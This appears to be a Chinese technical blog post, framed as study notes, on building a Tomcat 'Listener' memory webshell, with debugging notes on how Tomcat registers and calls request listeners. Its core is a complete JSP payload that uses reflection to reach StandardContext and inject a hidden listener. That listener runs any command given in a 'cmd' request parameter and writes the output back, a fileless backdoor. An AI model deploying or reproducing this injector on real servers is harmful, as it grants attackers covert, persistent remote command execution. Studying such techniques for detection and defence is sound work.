Tomcat-Listener内存马

最新推荐文章于 2023-10-07 16:20:09 发布
最新推荐文章于 2023-10-07 16:20:09 发布
阅读量311 收藏
点赞数 1
分类专栏: 内存马 文章标签: tomcat java intellij-idea
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/122515701
版权

Tomcat-Listener内存马

这篇文章记录下学习 Listener 内存马学习到的东西,思路跟 Filter 型内存马差不多,找一个相对通用的 Listener ,这里用的是 ServletRequestListener ,所有的 servlet 请求都会经过这个 Listener,接下来写一个例子调试分析 Listener 的注册过程和调用过程,相对来说比较简单!

创建工程

IDEA 打开创建一个 web 工程,导入如下依赖

<dependency>
    <groupId>junit</groupId>
    <artifactId>junit</artifactId>
    <version>4.11</version>
</dependency>
<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>servlet-api</artifactId>
    <version>2.5</version>
</dependency>
<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>jstl</artifactId>
    <version>1.2</version>
</dependency>
<dependency>
    <groupId>javax.servlet.jsp</groupId>
    <artifactId>jsp-api</artifactId>
    <version>2.2</version>
</dependency>
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>9.0.20</version>
    <scope>compile</scope>
</dependency>

编写 Servlet 程序

@WebServlet("/listener")
public class TestListener extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        resp.getWriter().write("tomcat-listener!!");
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

编写 Listener 程序

@WebListener
public class ServletListener implements ServletRequestListener {
    @Override
    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
    }

    @Override
    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
        System.out.println("ServletListener#requestInitialized is invoked!");
    }
}

因为调试涉及到 Tomcat 中间件包里的代码,所以需要把 Tomcat 下 lib 目录下的包都导入进来
image-20211231203007735
启动 Tomcat 中间件,访问 /listener 这个 Servlet 会发现调用了 ServletListener#requestInitialized 方法

调试分析

既然访问任何 Servlet 都会调用 ServletListener#requestInitialized 方法,那么只需反射注入 ServletListener 监听器即可,为了理解编写的 payload,下面分析监听器的注册和调用,在 ServletListener 类上下断点调试启动 Tomcat 中间件
image-20220103195857633
跟进到 StandardContext#listenerStart 方法,先获取监听器然后遍历监听器进行实例化
image-20220103200131114
监听器从 findApplicationListeners 方法返回,跟进看一下返回的是 applicationListeners 属性,其中包含我们编写的 ServletListener
image-20220103200306409
遍历并实例化完监听器之后把实例化对象加入到 eventListeners 中, 然后通过 setApplicationEventListeners 方法把 eventListeners 设置到 applicationEventListenersList
image-20220103200734308
跟进一下 setApplicationEventListeners 方法,可以知道最终实例化出来的监听器被存储在 applicationEventListenersList 属性中
image-20220103200835098
注册监听器就完成了,下面来看看是怎么调用注册的监听器的,在 requestInitialized 方法上下断点,调试启动 Tomcat 中间件
image-20220103201012485
跟进到 StandardContext#fireRequestInitEvent 方法,通过 getApplicationEventListeners 方法获取到前面注册的监听器,然后循环遍历调用监听器的 requestInitialized 方法
image-20220103201403553

构造内存马进行注入

通过上面的分析可以知道,最后遍历调用的是 StandardContext.applicationEventListenersList 属性,所以内存马构造中需要获取到 StandardContext 类,然后获取其 applicationEventListenersList 属性,最后注入我们构造的恶意监听器到 applicationEventListenersList 属性里,构造如下

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="org.apache.catalina.connector.RequestFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.ArrayList" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
    class ServletListener implements ServletRequestListener {
        @Override
        public void requestDestroyed(ServletRequestEvent servletRequestEvent) {

        }

        @Override
        public void requestInitialized(ServletRequestEvent servletRequestEvent) {
            try {
                String cmd = servletRequestEvent.getServletRequest().getParameter("cmd");
                //获取到 Response 对象,用于命令回显输出
                org.apache.catalina.connector.RequestFacade requestFacade = (RequestFacade) servletRequestEvent.getServletRequest();
                Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");
                requestField.setAccessible(true);
                Request request = (Request) requestField.get(requestFacade);
                Response response = (Response) request.getResponse();
				
                //命令执行并通过 Response 对象进行输出结果到浏览器中
                if (cmd != null){
                    InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
                    int i = 0;
                    byte[] bytes = new byte[1024];
                    while ((i = inputStream.read(bytes)) != -1){
                        response.getWriter().write(new String(bytes,0,i));
                        response.getWriter().write("\r\n");
                    }
                }
            }catch (Exception e){
                e.printStackTrace();
            }

        }
    }
%>


<%
	//获取到 StandardContext 对象的 applicationEventListenersList 属性,最后把恶意构造的监听器注入到 applicationEventListenersList 属性中
    ServletContext servletContext = request.getServletContext();
    Field applicationContextField = servletContext.getClass().getDeclaredField("context");
    applicationContextField.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);
    Field standardContextField = applicationContext.getClass().getDeclaredField("context");
    standardContextField.setAccessible(true);
    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
    Object[] applicationEventListeners = standardContext.getApplicationEventListeners();
    List<Object> objects = Arrays.asList(applicationEventListeners);
    ArrayList arrayList = new ArrayList(objects);
    arrayList.add(new ServletListener());
    standardContext.setApplicationEventListeners(arrayList.toArray());
    response.getWriter().write("Inject Success by listener!");
%>

参考

https://www.yuque.com/tianxiadamutou/zcfd4v/na64yv#7d994138

0x6b79
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java Tomcat内存——Listener内存
m0_61506558的博客
12-01 792
监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。事件:方法调用、属性改变、状态改变等。事件源:被监听的对象( 例如:request、session、servletContext)。监听器:用于监听事件源对象 ,事件源对象状态的变化都会触发监听器。注册监听器:将监听器与事件源进行绑定监听对象创建和销毁的监听器监听对象中属性变更的监听器。
TomcatListener&Filter
qq_43502858的博客
05-21 1246
TomcatListener&Filter 1.Listener详解 1.Listener介绍 监听器,监听某一个事件的发生或者某一个状态的改变,不论什么监听器的实现都是基于接口回调,监听器的内部机制就是接口回调。 2.监听器原理 没考虑回调的做法: TestA.java package com.nikehu.demo; public class TestA { public v...
深入底层源码的Listener内存(内存系列篇三)
m0_71746299的博客
01-27 289
写在前面 继前面的Filter``Servlet内存技术,这是系列文章的第三篇了,这篇将给大家带来的是Listener内存技术。 前置 什么是Listener? 监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。 监听器的相关概念: 事件:方法调用、属性改变、状态改变等。 事件源:被监听的对象( 例如:request、session、servletContext)。
web.xml 中的listener、 filter、servlet 加载顺序及其详解
weixin_34404393的博客
09-28 456
在项目中总会遇到一些关于加载的优先级问题,刚刚就遇到了一个问题,由于项目中使用了quartz任务调度,quartz在web.xml中是使用listener进行监听的,使得在tomcat启动的时候能上检查数据库查看那些任务未被按时执行,而数据库的配置信息在是在web.xml中使用servlet配置的,导致tomcat启动后在执行quartz任务时报空指针,原因就是servlet中的数据库连接信息未...
java内存学习记录(一)Tomcat Listener内存
AsagiRiAsagi的博客
03-18 267
这里的request是org.apache.catalina.connector.Request,实现了HttpServletRequest接口,因为jsp本质是servlet,可以直接调用。接口的监听器一般作用于tomcat初始化启动阶段,此时客户端的请求还没进入解析阶段,不适合用于内存。Request类型的Listener触发难度比较低,直接访问就可以,适合注册作为内存Listener是最先被加载的,Listener分以下几种。接口应用于各个对象事件的监听,有许多继承它的接口。
S07-tomcatListener内存1
08-03
Listener的介绍tomcatListener 分为两类, org.apache.catalina.LifecycleListener 以及 java
tetra-listener-vagrant:TETRA-Listener流浪者模板
02-06
tetra-listener-vagrant:TETRA-Listener流浪者模板
netty-shutdown-listener
04-28
将target/netty-shutdown-listener-0.0.1-SNAPSHOT.jar复制到$liferay_home/tomcat-9.0.6/lib/ 。 还要将netty-all-4.1.0.jar复制到$liferay_home/tomcat-9.0.6/lib/ 。 编辑到$liferay_home/tomcat-9.0.6/conf/...
Network-listener
05-23
位置: $HOME/Library/LaunchAgents/目录中的Network-Listener.plist 位置: /Applications目录中的Network Listener.app 使.networkConnected和.networkDisconnected可执行文件 可执行脚本: 文件....
spring-kafka-batch-listener.zip
10-08
spring-kafka顺序消费。 kafka顺序消费。 主要是为博客上传完整代码
Listener内存
最新发布
MachineGunJoe666
10-07 57
和 Filter 一样,监听器是 JavaWeb 三大组件之一。它是一个实现特定接口的java程序,这个程序用于监听web应用中的一些对象,信息的创建,添加,销毁等,然后针对于这些情况做出相应处理。总结来说,就是在application,session,request三个对象创建消亡或者往其中添加修改删除属性时自动执行代码的功能组件。
引入tomcat_Tomcat容器攻防笔记之Listener内存
weixin_35348182的博客
01-09 813
欢迎光临鲸落的杂货铺原文首发于安全客-安全资讯平台https://www.anquanke.com/post/id/226769(图自喜欢的古风插画家:微博@伊吹鸡腿子)背景: 基于现阶段红蓝对抗强度的提升,诸如WAF动态防御、态势感知、IDS恶意流量分析监测、文件多维特征监测、日志监测等手段,能够及时有效地检测、告警甚至阻断针对传统通过文件上传落地的Webshell或...
[Java安全]—Tomcat Listener内存
Sentiment的博客
07-14 3174
内存,也被称为无文件,是无文件攻击的一种常用手段。而无文件攻击呢顾名思义就是不利用shell文件进行攻击,但这里的无文件并不是真的意义上的“无文件”,而是一种攻击思路,是将恶意文件内容以脚本形式存在计算机中的内存、注册表子项目中或者利用系统合法工具以逃避安全检测的方法。servlet-api类○ listener型○ filter型○ servlet型spring类○ 拦截器○ controller型Java Instrumentation类○ agent型顾名思义就是监听器,他能够监听一些事件从而来达
Tomcat学习笔记
FanBly的博客
11-03 427
Tomcat学习笔记
Tomcat Java内存 listener
qq_40710190的博客
07-20 244
针对Tomcat Listener内存
Tomcat内存学习3:Listener
weixin_43263451的博客
07-24 442
上一篇讲了servlet型内存,而这次这个Listener内存也是大同小异,就是在内存中恶意创建一个Listener供攻击者使用必须搞懂Listener的加载机制在此加载机制基础上,设计出Listener内存poc。
学习了解内存,看这篇就够了!(精华版)
热门推荐
MachineGunJoe666
06-21 1万+
目录 介绍: 一、内存简介 1.1 webshell变迁 1.2 如何实现webshell内存 1.3 内存类型 二、背景知识 2.1 Java web三大件 2.2Tomcat 2.3 其他java背景知识 三、内存实现 四、内存检测与排查 4.1源码检测 4.2 内存排查 介绍: 内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到..
今天,咱不讲三国,就聊聊Shiro的反序列化漏洞,以及内存技术!
localhost01
07-15 7618
Shiro反序列化漏洞 漏洞介绍 上图为Shiro默认的登录页面,页面可见:Shiro提供了记住我(RememberMe)的功能。 然而,Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行:序列化、AES加密、Base64编码,三个操作。 而在识别身份的时候,则需要对Cookie里的rememberMe字段进行逆操作: Base64解码 AES解密 反序列化 由于AES加密的密钥K
glassfish iiop-listener
06-06
GlassFish IIOP(Internet Inter-ORB Protocol) 监听器(IIOP Listener)是 GlassFish 应用服务器中用于支持 CORBA 通信的一种网络协议栈。IIOP 是 CORBA 中用于实现对象之间通信的标准协议,是一种基于 TCP/IP ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值